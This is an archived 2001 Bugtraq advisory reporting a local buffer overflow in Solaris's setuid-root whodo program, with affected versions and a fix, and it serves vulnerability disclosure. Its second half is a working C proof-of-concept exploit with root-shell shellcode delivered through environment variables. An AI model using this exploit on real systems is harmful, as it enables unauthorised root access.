OSEC

Neohapsis is currently accepting applications for employment. For more information, please visit our website www.neohapsis.com or email hr@neohapsis.com
 
From: Pablo Sor (psorafip.gov.ar)
Date: Thu Jul 05 2001 - 09:55:55 CDT

  • Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

    Vulnerability in Solaris whodo

    Date Published: July 5, 2001

    Advisory ID: N/A

    Bugtraq ID: 2935

    CVE CAN: Non currently assigned.

    Title: Solaris whodo Buffer Overflow Vulnerability

    Class: Boundary Error Condition

    Remotely Exploitable: No

    Locally Exploitable: Yes

    Vulnerability Description:

    The whodo program is installed setuid root by default in Solaris.
    It contains a vulnerability in handling data from enviroment variables,
    if this variable exceeds predefined lenght an exploitable stack overflow
    can occur.
    Through exploiting this vulnerability an attacker can gain effective
    uid root.

    Vulnerable Packages/Systems:

    SunOS 5.8
    SunOS 5.7
    SunOS 5.5.1

    (have not tested on other version)

    Solution/Vendor :

    Sun Microsystems was notified on June 28, 2001. Patches are excepted
    shortly.

    Quick Fix:

    Clear the suid bit of

    /usr/sbin/sparcv7/whodo (SunOS 5.8 Sparc)
    /usr/sbin/i86/whodo (SunOS 5.8, 5.7 Intel)
    /usr/sbin/whodo (SunOS 5.5.1)

    Credits:

    This vulnerability was discovered by Pablo Sor, Buenos Aires, Argentina.
    psorafip.gov.ar, psorccc.uba.ar

    This advisory was drafted with the help of the SecurityFocus.com Vulnerability
    Help Team. For more information or assistance drafting advisories please mail
    vulnhelpsecurityfocus.com.

    Technical Description - Exploit/Concept Code:

    #include <fcntl.h>

    /*
       /usr/sbin/i86/whodo overflow proof of conecpt.

       Pablo Sor, Buenos Aires, Argentina 06/2001
       psorafip.gov.ar, psorccc.uba.ar

       works against x86 solaris 8

       default offset +/- 100 should work.

    */

    long get_esp() { __asm__("movl %esp,%eax"); }

    int main(int ac, char **av)
    {

    char shell[]=
     "\xeb\x48\x9a\xff\xff\xff\xff\x07\xff\xc3\x5e\x31\xc0\x89\x46\xb4"
     "\x88\x46\xb9\x88\x46\x07\x89\x46\x0c\x31\xc0\x50\xb0\x8d\xe8\xdf"
     "\xff\xff\xff\x83\xc4\x04\x31\xc0\x50\xb0\x17\xe8\xd2\xff\xff\xff"
     "\x83\xc4\x04\x31\xc0\x50\x8d\x5e\x08\x53\x8d\x1e\x89\x5e\x08\x53"
     "\xb0\x3b\xe8\xbb\xff\xff\xff\x83\xc4\x0c\xe8\xbb\xff\xff\xff\x2f"
     "\x62\x69\x6e\x2f\x73\x68\xff\xff\xff\xff\xff\xff";

      unsigned long magic = get_esp() + 1180; /* default offset */

      unsigned char buf[800];
      char *env;

      env = (char *) malloc(400*sizeof(char));
      memset(env,0x90,400);
      memcpy(env+160,shell,strlen(shell));
      memcpy(env,"SOR=",4);
      buf[399]=0;
      putenv(env);
      
      memset(buf,0x41,800);
      memcpy(buf+271,&magic,4);
      memcpy(buf,"CFTIME=",7);
      buf[799]=0;
      putenv(buf);

      system("/usr/sbin/i86/whodo");
    }

    -- 
    Pablo Sor
    psorafip.gov.ar, psorccc.uba.ar